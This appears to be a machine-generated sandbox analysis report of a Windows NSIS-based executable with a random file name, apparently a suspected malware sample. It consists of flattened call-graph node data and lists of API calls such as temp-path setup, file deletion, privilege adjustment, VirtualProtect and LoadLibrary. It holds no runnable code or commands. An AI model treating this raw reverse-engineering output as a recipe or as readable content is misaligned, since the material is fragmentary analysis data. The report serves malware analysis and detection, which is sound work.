5175->5183 5184 406599 WideCharToMultiByte 5176->5184 5177->5175 5179 4026b2 lstrlenA 5179->5175 5181 406119 WriteFile 5180->5181 5180->5182 5181->5182 5183->5180 5184->5179 5185 404f63 GetDlgItem GetDlgItem 5186 404fb5 7 API calls 5185->5186 5192 4051da 5185->5192 5187 40505c DeleteObject 5186->5187 5188 40504f SendMessageW 5186->5188 5189 405065 5187->5189 5188->5187 5190 40509c 5189->5190 5193 4065b4 21 API calls 5189->5193 5194 4044f6 22 API calls 5190->5194 5191 4052bc 5195 405368 5191->5195 5206 405315 SendMessageW 5191->5206 5228 4051cd 5191->5228 5192->5191 5200 405249 5192->5200 5239 404eb1 SendMessageW 5192->5239 5198 40507e SendMessageW SendMessageW 5193->5198 5199 4050b0 5194->5199 5196 405372 SendMessageW 5195->5196 5197 40537a 5195->5197 5196->5197 5203 4053a3 5197->5203 5208 405393 5197->5208 5209 40538c ImageList_Destroy 5197->5209 5198->5189 5205 4044f6 22 API calls 5199->5205 5200->5191 5201 4052ae SendMessageW 5200->5201 5201->5191 5202 40455d 8 API calls 5207 405569 5202->5207 5211 40551d 5203->5211 5232 4053de 5203->5232 5244 404f31 5203->5244 5210 4050c1 5205->5210 5212 40532a SendMessageW 5206->5212 5206->5228 5208->5203 5213 40539c GlobalFree 5208->5213 5209->5208 5214 40519c GetWindowLongW SetWindowLongW 5210->5214 5220 405197 5210->5220 5223 405114 SendMessageW 5210->5223 5225 405152 SendMessageW 5210->5225 5226 405166 SendMessageW 5210->5226 5217 40552f ShowWindow GetDlgItem ShowWindow 5211->5217 5211->5228 5216 40533d 5212->5216 5213->5203 5215 4051b5 5214->5215 5218 4051d2 5215->5218 5219 4051ba ShowWindow 5215->5219 5224 40534e SendMessageW 5216->5224 5217->5228 5238 40452b SendMessageW 5218->5238 5237 40452b SendMessageW 5219->5237 5220->5214 5220->5215 5223->5210 5224->5195 5225->5210 5226->5210 5228->5202 5229 4054e8 5230 4054f3 InvalidateRect 5229->5230 5233 4054ff 5229->5233 5230->5233 5231 40540c SendMessageW 5235 405422 5231->5235 5232->5231 5232->5235 5233->5211 5253 404e6c 5233->5253 5234 405496 SendMessageW SendMessageW 
5234->5235 5235->5229 5235->5234 5237->5228 5238->5192 5240 404f10 SendMessageW 5239->5240 5241 404ed4 GetMessagePos ScreenToClient SendMessageW 5239->5241 5243 404f08 5240->5243 5242 404f0d 5241->5242 5241->5243 5242->5240 5243->5200 5256 406577 lstrcpynW 5244->5256 5246 404f44 5257 4064be wsprintfW 5246->5257 5248 404f4e 5249 40140b 2 API calls 5248->5249 5250 404f57 5249->5250 5258 406577 lstrcpynW 5250->5258 5252 404f5e 5252->5232 5259 404da3 5253->5259 5255 404e81 5255->5211 5256->5246 5257->5248 5258->5252 5260 404dbc 5259->5260 5261 4065b4 21 API calls 5260->5261 5262 404e20 5261->5262 5263 4065b4 21 API calls 5262->5263 5264 404e2b 5263->5264 5265 4065b4 21 API calls 5264->5265 5266 404e41 lstrlenW wsprintfW SetDlgItemTextW 5265->5266 5266->5255 5267 6fc410e1 5273 6fc41111 5267->5273 5268 6fc412b0 GlobalFree 5269 6fc411d7 GlobalAlloc 5269->5273 5270 6fc41240 GlobalFree 5270->5273 5271 6fc412ab 5271->5268 5272 6fc4135a 2 API calls 5272->5273 5273->5268 5273->5269 5273->5270 5273->5271 5273->5272 5274 6fc41312 2 API calls 5273->5274 5275 6fc4129a GlobalFree 5273->5275 5276 6fc4116b GlobalAlloc 5273->5276 5277 6fc41381 lstrcpyW 5273->5277 5274->5273 5275->5273 5276->5273 5277->5273 4670 4015e6 4671 402dcb 21 API calls 4670->4671 4672 4015ed 4671->4672 4673 405ef1 4 API calls 4672->4673 4685 4015f6 4673->4685 4674 401656 4676 401688 4674->4676 4677 40165b 4674->4677 4675 405e73 CharNextW 4675->4685 4680 401423 28 API calls 4676->4680 4678 401423 28 API calls 4677->4678 4679 401662 4678->4679 4689 406577 lstrcpynW 4679->4689 4686 401680 4680->4686 4682 405b25 2 API calls 4682->4685 4683 405b42 5 API calls 4683->4685 4684 40166f SetCurrentDirectoryW 4684->4686 4685->4674 4685->4675 4685->4682 4685->4683 4687 40163c GetFileAttributesW 4685->4687 4688 405acb 2 API calls 4685->4688 4687->4685 4688->4685 4689->4684 5278 404666 lstrlenW 5279 404685 5278->5279 5280 404687 WideCharToMultiByte 5278->5280 5279->5280 5281 4049e7 5282 404a13 5281->5282 5283 404a24 
5281->5283 5342 405bbb GetDlgItemTextW 5282->5342 5284 404a30 GetDlgItem 5283->5284 5291 404a8f 5283->5291 5286 404a44 5284->5286 5290 404a58 SetWindowTextW 5286->5290 5295 405ef1 4 API calls 5286->5295 5287 404b73 5292 404d22 5287->5292 5344 405bbb GetDlgItemTextW 5287->5344 5288 404a1e 5289 406825 5 API calls 5288->5289 5289->5283 5296 4044f6 22 API calls 5290->5296 5291->5287 5291->5292 5297 4065b4 21 API calls 5291->5297 5294 40455d 8 API calls 5292->5294 5299 404d36 5294->5299 5300 404a4e 5295->5300 5301 404a74 5296->5301 5302 404b03 SHBrowseForFolderW 5297->5302 5298 404ba3 5303 405f4e 18 API calls 5298->5303 5300->5290 5307 405e46 3 API calls 5300->5307 5304 4044f6 22 API calls 5301->5304 5302->5287 5305 404b1b CoTaskMemFree 5302->5305 5306 404ba9 5303->5306 5308 404a82 5304->5308 5309 405e46 3 API calls 5305->5309 5345 406577 lstrcpynW 5306->5345 5307->5290 5343 40452b SendMessageW 5308->5343 5311 404b28 5309->5311 5314 404b5f SetDlgItemTextW 5311->5314 5318 4065b4 21 API calls 5311->5318 5313 404a88 5317 40696b 5 API calls 5313->5317 5314->5287 5315 404bc0 5316 40696b 5 API calls 5315->5316 5324 404bc7 5316->5324 5317->5291 5319 404b47 lstrcmpiW 5318->5319 5319->5314 5321 404b58 lstrcatW 5319->5321 5320 404c08 5346 406577 lstrcpynW 5320->5346 5321->5314 5323 404c0f 5325 405ef1 4 API calls 5323->5325 5324->5320 5329 405e92 2 API calls 5324->5329 5330 404c60 5324->5330 5326 404c15 GetDiskFreeSpaceW 5325->5326 5328 404c39 MulDiv 5326->5328 5326->5330 5328->5330 5329->5324 5331 404cd1 5330->5331 5333 404e6c 24 API calls 5330->5333 5332 404cf4 5331->5332 5334 40140b 2 API calls 5331->5334 5347 404518 KiUserCallbackDispatcher 5332->5347 5335 404cbe 5333->5335 5334->5332 5336 404cd3 SetDlgItemTextW 5335->5336 5337 404cc3 5335->5337 5336->5331 5339 404da3 24 API calls 5337->5339 5339->5331 5340 404d10 5340->5292 5348 404940 5340->5348 5342->5288 5343->5313 5344->5298 5345->5315 5346->5323 5347->5340 5349 404953 SendMessageW 5348->5349 5350 40494e 5348->5350 
5349->5292 5350->5349 5351 401c68 5352 402da9 21 API calls 5351->5352 5353 401c6f 5352->5353 5354 402da9 21 API calls 5353->5354 5355 401c7c 5354->5355 5356 401c91 5355->5356 5358 402dcb 21 API calls 5355->5358 5357 401ca1 5356->5357 5359 402dcb 21 API calls 5356->5359 5360 401cf8 5357->5360 5361 401cac 5357->5361 5358->5356 5359->5357 5363 402dcb 21 API calls 5360->5363 5362 402da9 21 API calls 5361->5362 5364 401cb1 5362->5364 5365 401cfd 5363->5365 5366 402da9 21 API calls 5364->5366 5367 402dcb 21 API calls 5365->5367 5369 401cbd 5366->5369 5368 401d06 FindWindowExW 5367->5368 5372 401d28 5368->5372 5370 401ce8 SendMessageW 5369->5370 5371 401cca SendMessageTimeoutW 5369->5371 5370->5372 5371->5372 5373 4028e9 5374 4028ef 5373->5374 5375 4028f7 FindClose 5374->5375 5376 402c4f 5374->5376 5375->5376 5377 6fc423e9 5378 6fc42453 5377->5378 5379 6fc4245e GlobalAlloc 5378->5379 5380 6fc4247d 5378->5380 5379->5378 5381 6fc41774 5382 6fc417a3 5381->5382 5383 6fc41bff 22 API calls 5382->5383 5384 6fc417aa 5383->5384 5385 6fc417b1 5384->5385 5386 6fc417bd 5384->5386 5387 6fc41312 2 API calls 5385->5387 5388 6fc417e4 5386->5388 5389 6fc417c7 5386->5389 5392 6fc417bb 5387->5392 5390 6fc4180e 5388->5390 5391 6fc417ea 5388->5391 5393 6fc415dd 3 API calls 5389->5393 5395 6fc415dd 3 API calls 5390->5395 5394 6fc41654 3 API calls 5391->5394 5396 6fc417cc 5393->5396 5397 6fc417ef 5394->5397 5395->5392 5398 6fc41654 3 API calls 5396->5398 5399 6fc41312 2 API calls 5397->5399 5400 6fc417d2 5398->5400 5401 6fc417f5 GlobalFree 5399->5401 5402 6fc41312 2 API calls 5400->5402 5401->5392 5404 6fc41809 GlobalFree 5401->5404 5403 6fc417d8 GlobalFree 5402->5403 5403->5392 5404->5392 5405 405570 5406 405580 5405->5406 5407 405594 5405->5407 5408 405586 5406->5408 5409 4055dd 5406->5409 5410 40559c IsWindowVisible 5407->5410 5416 4055b3 5407->5416 5412 404542 SendMessageW 5408->5412 5411 4055e2 CallWindowProcW 5409->5411 5410->5409 5413 4055a9 5410->5413 5415 405590 5411->5415 5412->5415 
5414 404eb1 5 API calls 5413->5414 5414->5416 5416->5411 5417 404f31 4 API calls 5416->5417 5417->5409 5418 4016f1 5419 402dcb 21 API calls 5418->5419 5420 4016f7 GetFullPathNameW 5419->5420 5421 401711 5420->5421 5427 401733 5420->5427 5424 4068d4 2 API calls 5421->5424 5421->5427 5422 401748 GetShortPathNameW 5423 402c4f 5422->5423 5425 401723 5424->5425 5425->5427 5428 406577 lstrcpynW 5425->5428 5427->5422 5427->5423 5428->5427 5429 401e73 GetDC 5430 402da9 21 API calls 5429->5430 5431 401e85 GetDeviceCaps MulDiv ReleaseDC 5430->5431 5432 402da9 21 API calls 5431->5432 5433 401eb6 5432->5433 5434 4065b4 21 API calls 5433->5434 5435 401ef3 CreateFontIndirectW 5434->5435 5436 40265d 5435->5436 5437 4014f5 SetForegroundWindow 5438 402c4f 5437->5438 5439 402975 5440 402dcb 21 API calls 5439->5440 5441 402981 5440->5441 5442 402997 5441->5442 5443 402dcb 21 API calls 5441->5443 5444 406042 2 API calls 5442->5444 5443->5442 5445 40299d 5444->5445 5467 406067 GetFileAttributesW CreateFileW 5445->5467 5447 4029aa 5448 402a60 5447->5448 5449 4029c5 GlobalAlloc 5447->5449 5450 402a48 5447->5450 5451 402a67 DeleteFileW 5448->5451 5452 402a7a 5448->5452 5449->5450 5453 4029de 5449->5453 5454 4032d9 35 API calls 5450->5454 5451->5452 5468 40350a SetFilePointer 5453->5468 5456 402a55 CloseHandle 5454->5456 5456->5448 5457 4029e4 5458 4034f4 ReadFile 5457->5458 5459 4029ed GlobalAlloc 5458->5459 5460 402a31 5459->5460 5461 4029fd 5459->5461 5463 406119 WriteFile 5460->5463 5462 4032d9 35 API calls 5461->5462 5466 402a0a 5462->5466 5464 402a3d GlobalFree 5463->5464 5464->5450 5465 402a28 GlobalFree 5465->5460 5466->5465 5467->5447 5468->5457 4730 403ff7 4731 404170 4730->4731 4732 40400f 4730->4732 4734 404181 GetDlgItem GetDlgItem 4731->4734 4735 4041c1 4731->4735 4732->4731 4733 40401b 4732->4733 4737 404026 SetWindowPos 4733->4737 4738 404039 4733->4738 4739 4044f6 22 API calls 4734->4739 4736 40421b 4735->4736 4744 401389 2 API calls 4735->4744 4740 404542 SendMessageW 
4736->4740 4757 40416b 4736->4757 4737->4738 4741 404042 ShowWindow 4738->4741 4742 404084 4738->4742 4743 4041ab SetClassLongW 4739->4743 4774 40422d 4740->4774 4745 404062 GetWindowLongW 4741->4745 4746 40415d 4741->4746 4747 4040a3 4742->4747 4748 40408c DestroyWindow 4742->4748 4749 40140b 2 API calls 4743->4749 4752 4041f3 4744->4752 4745->4746 4754 40407b ShowWindow 4745->4754 4812 40455d 4746->4812 4750 4040a8 SetWindowLongW 4747->4750 4751 4040b9 4747->4751 4802 40447f 4748->4802 4749->4735 4750->4757 4751->4746 4755 4040c5 GetDlgItem 4751->4755 4752->4736 4756 4041f7 SendMessageW 4752->4756 4754->4742 4760 4040f3 4755->4760 4761 4040d6 SendMessageW IsWindowEnabled 4755->4761 4756->4757 4758 40140b 2 API calls 4758->4774 4759 404481 DestroyWindow EndDialog 4759->4802 4764 404100 4760->4764 4766 404147 SendMessageW 4760->4766 4767 404113 4760->4767 4776 4040f8 4760->4776 4761->4757 4761->4760 4762 4044b0 ShowWindow 4762->4757 4763 4065b4 21 API calls 4763->4774 4764->4766 4764->4776 4766->4746 4769 404130 4767->4769 4770 40411b 4767->4770 4768 40412e 4768->4746 4772 40140b 2 API calls 4769->4772 4773 40140b 2 API calls 4770->4773 4771 4044f6 22 API calls 4771->4774 4775 404137 4772->4775 4773->4776 4774->4757 4774->4758 4774->4759 4774->4763 4774->4771 4793 4043c1 DestroyWindow 4774->4793 4803 4044f6 4774->4803 4775->4746 4775->4776 4809 4044cf 4776->4809 4778 4042a8 GetDlgItem 4779 4042c5 ShowWindow KiUserCallbackDispatcher 4778->4779 4780 4042bd 4778->4780 4806 404518 KiUserCallbackDispatcher 4779->4806 4780->4779 4782 4042ef EnableWindow 4787 404303 4782->4787 4783 404308 GetSystemMenu EnableMenuItem SendMessageW 4784 404338 SendMessageW 4783->4784 4783->4787 4784->4787 4786 403fd8 22 API calls 4786->4787 4787->4783 4787->4786 4807 40452b SendMessageW 4787->4807 4808 406577 lstrcpynW 4787->4808 4789 404367 lstrlenW 4790 4065b4 21 API calls 4789->4790 4791 40437d SetWindowTextW 4790->4791 4792 401389 2 API calls 4791->4792 4792->4774 4794 4043db 
CreateDialogParamW 4793->4794 4793->4802 4795 40440e 4794->4795 4794->4802 4796 4044f6 22 API calls 4795->4796 4797 404419 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4796->4797 4798 401389 2 API calls 4797->4798 4799 40445f 4798->4799 4799->4757 4800 404467 ShowWindow 4799->4800 4801 404542 SendMessageW 4800->4801 4801->4802 4802->4757 4802->4762 4804 4065b4 21 API calls 4803->4804 4805 404501 SetDlgItemTextW 4804->4805 4805->4778 4806->4782 4807->4787 4808->4789 4810 4044d6 4809->4810 4811 4044dc SendMessageW 4809->4811 4810->4811 4811->4768 4813 404575 GetWindowLongW 4812->4813 4823 404620 4812->4823 4814 40458a 4813->4814 4813->4823 4815 4045b7 GetSysColor 4814->4815 4816 4045ba 4814->4816 4814->4823 4815->4816 4817 4045c0 SetTextColor 4816->4817 4818 4045ca SetBkMode 4816->4818 4817->4818 4819 4045e2 GetSysColor 4818->4819 4820 4045e8 4818->4820 4819->4820 4821 4045f9 4820->4821 4822 4045ef SetBkColor 4820->4822 4821->4823 4824 404613 CreateBrushIndirect 4821->4824 4825 40460c DeleteObject 4821->4825 4822->4821 4823->4757 4824->4823 4825->4824 4826 6fc42a7f 4827 6fc42acf 4826->4827 4828 6fc42a8f VirtualProtect 4826->4828 4828->4827 5469 40197b 5470 402dcb 21 API calls 5469->5470 5471 401982 lstrlenW 5470->5471 5472 40265d 5471->5472 4879 4020fd 4880 4021c1 4879->4880 4881 40210f 4879->4881 4884 401423 28 API calls 4880->4884 4882 402dcb 21 API calls 4881->4882 4883 402116 4882->4883 4885 402dcb 21 API calls 4883->4885 4890 40231b 4884->4890 4886 40211f 4885->4886 4887 402135 LoadLibraryExW 4886->4887 4888 402127 GetModuleHandleW 4886->4888 4887->4880 4889 402146 4887->4889 4888->4887 4888->4889 4902 4069da 4889->4902 4893 402190 4895 4055fc 28 API calls 4893->4895 4894 402157 4896 402176 4894->4896 4897 40215f 4894->4897 4898 402167 4895->4898 4907 6fc41817 4896->4907 4899 401423 28 API calls 4897->4899 4898->4890 4900 4021b3 FreeLibrary 4898->4900 4899->4898 4900->4890 4949 406599 WideCharToMultiByte 4902->4949 4904 4069f7 4905 402151 4904->4905 4906 
4069fe GetProcAddress 4904->4906 4905->4893 4905->4894 4906->4905 4908 6fc4184a 4907->4908 4950 6fc41bff 4908->4950 4910 6fc41851 4911 6fc41976 4910->4911 4912 6fc41862 4910->4912 4913 6fc41869 4910->4913 4911->4898 5000 6fc4243e 4912->5000 4984 6fc42480 4913->4984 4918 6fc418cd 4924 6fc418d3 4918->4924 4925 6fc4191e 4918->4925 4919 6fc418af 5013 6fc42655 4919->5013 4920 6fc4187f 4923 6fc41885 4920->4923 4929 6fc41890 4920->4929 4921 6fc41898 4932 6fc4188e 4921->4932 5010 6fc42e23 4921->5010 4923->4932 4994 6fc42b98 4923->4994 5032 6fc41666 4924->5032 4927 6fc42655 10 API calls 4925->4927 4933 6fc4190f 4927->4933 4928 6fc418b5 5024 6fc41654 4928->5024 5004 6fc42810 4929->5004 4932->4918 4932->4919 4940 6fc41965 4933->4940 5038 6fc42618 4933->5038 4938 6fc41896 4938->4932 4939 6fc42655 10 API calls 4939->4933 4940->4911 4942 6fc4196f GlobalFree 4940->4942 4942->4911 4946 6fc41951 4946->4940 5042 6fc415dd wsprintfW 4946->5042 4947 6fc4194a FreeLibrary 4947->4946 4949->4904 5045 6fc412bb GlobalAlloc 4950->5045 4952 6fc41c26 5046 6fc412bb GlobalAlloc 4952->5046 4954 6fc41e6b GlobalFree GlobalFree GlobalFree 4955 6fc41e88 4954->4955 4968 6fc41ed2 4954->4968 4956 6fc4227e 4955->4956 4964 6fc41e9d 4955->4964 4955->4968 4958 6fc422a0 GetModuleHandleW 4956->4958 4956->4968 4957 6fc41d26 GlobalAlloc 4974 6fc41c31 4957->4974 4960 6fc422c6 4958->4960 4961 6fc422b1 LoadLibraryW 4958->4961 4959 6fc41d8f GlobalFree 4959->4974 5053 6fc416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4960->5053 4961->4960 4961->4968 4962 6fc41d71 lstrcpyW 4963 6fc41d7b lstrcpyW 4962->4963 4963->4974 4964->4968 5049 6fc412cc 4964->5049 4966 6fc42318 4966->4968 4971 6fc42325 lstrlenW 4966->4971 4967 6fc42126 5052 6fc412bb GlobalAlloc 4967->5052 4968->4910 5054 6fc416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4971->5054 4972 6fc422d8 4972->4966 4982 6fc42302 GetProcAddress 4972->4982 4974->4954 4974->4957 4974->4959 4974->4962 
4974->4963 4974->4967 4974->4968 4975 6fc42067 GlobalFree 4974->4975 4976 6fc421ae 4974->4976 4977 6fc412cc 2 API calls 4974->4977 4978 6fc41dcd 4974->4978 4975->4974 4976->4968 4981 6fc42216 lstrcpyW 4976->4981 4977->4974 4978->4974 5047 6fc4162f GlobalSize GlobalAlloc 4978->5047 4979 6fc4233f 4979->4968 4981->4968 4982->4966 4983 6fc4212f 4983->4910 4985 6fc42498 4984->4985 4987 6fc425c1 GlobalFree 4985->4987 4989 6fc42540 GlobalAlloc WideCharToMultiByte 4985->4989 4990 6fc4256b GlobalAlloc 4985->4990 4991 6fc412cc GlobalAlloc lstrcpynW 4985->4991 4992 6fc42582 4985->4992 5056 6fc4135a 4985->5056 4987->4985 4988 6fc4186f 4987->4988 4988->4920 4988->4921 4988->4932 4989->4987 4990->4992 4991->4985 4992->4987 5060 6fc427a4 4992->5060 4996 6fc42baa 4994->4996 4995 6fc42c4f CreateFileA 4997 6fc42c6d 4995->4997 4996->4995 5063 6fc42b42 4997->5063 4999 6fc42d39 4999->4932 5001 6fc42453 5000->5001 5002 6fc4245e GlobalAlloc 5001->5002 5003 6fc41868 5001->5003 5002->5001 5003->4913 5008 6fc42840 5004->5008 5005 6fc428ee 5007 6fc428f4 GlobalSize 5005->5007 5009 6fc428fe 5005->5009 5006 6fc428db GlobalAlloc 5006->5009 5007->5009 5008->5005 5008->5006 5009->4938 5011 6fc42e2e 5010->5011 5012 6fc42e6e GlobalFree 5011->5012 5067 6fc412bb GlobalAlloc 5013->5067 5015 6fc426d8 MultiByteToWideChar 5022 6fc4265f 5015->5022 5016 6fc426fa StringFromGUID2 5016->5022 5017 6fc4270b lstrcpynW 5017->5022 5018 6fc4271e wsprintfW 5018->5022 5019 6fc42742 GlobalFree 5019->5022 5020 6fc42777 GlobalFree 5020->4928 5021 6fc41312 2 API calls 5021->5022 5022->5015 5022->5016 5022->5017 5022->5018 5022->5019 5022->5020 5022->5021 5068 6fc41381 5022->5068 5072 6fc412bb GlobalAlloc 5024->5072 5026 6fc41659 5027 6fc41666 2 API calls 5026->5027 5028 6fc41663 5027->5028 5029 6fc41312 5028->5029 5030 6fc41355 GlobalFree 5029->5030 5031 6fc4131b GlobalAlloc lstrcpynW 5029->5031 5030->4933 5031->5030 5033 6fc41672 wsprintfW 5032->5033 5034 6fc4169f lstrcpyW 5032->5034 5037 6fc416b8 5033->5037 5034->5037 
5037->4939 5039 6fc41931 5038->5039 5040 6fc42626 5038->5040 5039->4946 5039->4947 5040->5039 5041 6fc42642 GlobalFree 5040->5041 5041->5040 5043 6fc41312 2 API calls 5042->5043 5044 6fc415fe 5043->5044 5044->4940 5045->4952 5046->4974 5048 6fc4164d 5047->5048 5048->4978 5055 6fc412bb GlobalAlloc 5049->5055 5051 6fc412db lstrcpynW 5051->4968 5052->4983 5053->4972 5054->4979 5055->5051 5057 6fc41361 5056->5057 5058 6fc412cc 2 API calls 5057->5058 5059 6fc4137f 5058->5059 5059->4985 5061 6fc427b2 VirtualAlloc 5060->5061 5062 6fc42808 5060->5062 5061->5062 5062->4992 5064 6fc42b4d 5063->5064 5065 6fc42b52 GetLastError 5064->5065 5066 6fc42b5d 5064->5066 5065->5066 5066->4999 5067->5022 5069 6fc413ac 5068->5069 5070 6fc4138a 5068->5070 5069->5022 5070->5069 5071 6fc41390 lstrcpyW 5070->5071 5071->5069 5072->5026 5473 6fc41979 5474 6fc4199c 5473->5474 5475 6fc419d1 GlobalFree 5474->5475 5476 6fc419e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5474->5476 5475->5476 5477 6fc41312 2 API calls 5476->5477 5478 6fc41b6e GlobalFree GlobalFree 5477->5478 5479 402b7e 5480 402bd0 5479->5480 5481 402b85 5479->5481 5482 40696b 5 API calls 5480->5482 5483 402da9 21 API calls 5481->5483 5487 402bce 5481->5487 5484 402bd7 5482->5484 5486 402b93 5483->5486 5485 402dcb 21 API calls 5484->5485 5488 402be0 5485->5488 5489 402da9 21 API calls 5486->5489 5488->5487 5490 402be4 IIDFromString 5488->5490 5492 402b9f 5489->5492 5490->5487 5491 402bf3 5490->5491 5491->5487 5497 406577 lstrcpynW 5491->5497 5496 4064be wsprintfW 5492->5496 5494 402c10 CoTaskMemFree 5494->5487 5496->5487 5497->5494 5498 401000 5499 401037 BeginPaint GetClientRect 5498->5499 5500 40100c DefWindowProcW 5498->5500 5502 4010f3 5499->5502 5503 401179 5500->5503 5504 401073 CreateBrushIndirect FillRect DeleteObject 5502->5504 5505 4010fc 5502->5505 5504->5502 5506 401102 CreateFontIndirectW 5505->5506 5507 401167 EndPaint 5505->5507 5506->5507 5508 401112 6 API calls 5506->5508 5507->5503 5508->5507 4018 401781 
                                                          Function-call graph (rendered as an image in the report; the extracted node/edge dump listed function addresses such as 402dcb, 4065b4 and 40573b, their caller->callee edges, and the resolved API names and API call counts per node)

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403552-4035a4 SetErrorMode GetVersionExW 1 4035a6-4035d6 GetVersionExW 0->1 2 4035de-4035e3 0->2 1->2 3 4035e5 2->3 4 4035eb-40362d 2->4 3->4 5 403640 4->5 6 40362f-403637 call 40696b 4->6 7 403645-403659 call 4068fb lstrlenA 5->7 6->5 11 403639 6->11 13 40365b-403677 call 40696b * 3 7->13 11->5 20 403688-4036ec #17 OleInitialize SHGetFileInfoW call 406577 GetCommandLineW call 406577 13->20 21 403679-40367f 13->21 28 4036f5-403709 call 405e73 CharNextW 20->28 29 4036ee-4036f0 20->29 21->20 25 403681 21->25 25->20 32 403804-40380a 28->32 29->28 33 403810 32->33 34 40370e-403714 32->34 35 403824-40383e GetTempPathW call 403521 33->35 36 403716-40371b 34->36 37 40371d-403724 34->37 46 403840-40385e GetWindowsDirectoryW lstrcatW call 403521 35->46 47 403896-4038b0 DeleteFileW call 4030a2 35->47 36->36 36->37 39 403726-40372b 37->39 40 40372c-403730 37->40 39->40 41 4037f1-403800 call 405e73 40->41 42 403736-40373c 40->42 41->32 61 403802-403803 41->61 44 403756-40378f 42->44 45 40373e-403745 42->45 51 403791-403796 44->51 52 4037ac-4037e6 44->52 49 403747-40374a 45->49 50 40374c 45->50 46->47 66 403860-403890 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403521 46->66 62 4038b6-4038bc 47->62 63 403a9d-403aad call 403b6f OleUninitialize 47->63 49->44 49->50 50->44 51->52 56 403798-4037a0 51->56 58 4037e8-4037ec 52->58 59 4037ee-4037f0 52->59 64 4037a2-4037a5 56->64 65 4037a7 56->65 58->59 67 403812-40381f call 406577 58->67 59->41 61->32 68 4038c2-4038cd call 405e73 62->68 69 403955-40395c call 403c49 62->69 77 403ad3-403ad9 63->77 78 403aaf-403abf call 405bd7 ExitProcess 63->78 64->52 64->65 65->52 66->47 66->63 67->35 82 40391b-403925 68->82 83 4038cf-403904 68->83 80 403961-403965 69->80 84 403b57-403b5f 77->84 85 403adb-403af1 GetCurrentProcess OpenProcessToken 77->85 80->63 92 403927-403935 call 405f4e 82->92 93 40396a-403990 call 405b42 lstrlenW call 406577 82->93 89 
403906-40390a 83->89 86 403b61 84->86 87 403b65-403b69 ExitProcess 84->87 90 403af3-403b21 LookupPrivilegeValueW AdjustTokenPrivileges 85->90 91 403b27-403b35 call 40696b 85->91 86->87 94 403913-403917 89->94 95 40390c-403911 89->95 90->91 104 403b43-403b4e ExitWindowsEx 91->104 105 403b37-403b41 91->105 92->63 106 40393b-403951 call 406577 * 2 92->106 110 4039a1-4039b9 93->110 111 403992-40399c call 406577 93->111 94->89 99 403919 94->99 95->94 95->99 99->82 104->84 108 403b50-403b52 call 40140b 104->108 105->104 105->108 106->69 108->84 117 4039be-4039c2 110->117 111->110 119 4039c7-4039f1 wsprintfW call 4065b4 117->119 122 4039f3-4039f8 call 405acb 119->122 123 4039fa call 405b25 119->123 127 4039ff-403a01 122->127 123->127 128 403a03-403a0d GetFileAttributesW 127->128 129 403a3d-403a5c SetCurrentDirectoryW call 406337 CopyFileW 127->129 130 403a2e-403a39 128->130 131 403a0f-403a18 DeleteFileW 128->131 136 403a9b 129->136 137 403a5e-403a7f call 406337 call 4065b4 call 405b5a 129->137 130->117 135 403a3b 130->135 131->130 134 403a1a-403a2c call 405c83 131->134 134->119 134->130 135->63 136->63 146 403a81-403a8b 137->146 147 403ac5-403ad1 CloseHandle 137->147 146->136 148 403a8d-403a95 call 4068d4 146->148 147->136 148->119 148->136
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403575
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                          • OleInitialize.OLE32(00000000), ref: 00403690
                                                          • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                          • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000020,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • wsprintfW.USER32 ref: 004039D1
                                                          • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 00403A04
                                                          • DeleteFileW.KERNEL32(00437800), ref: 00403A10
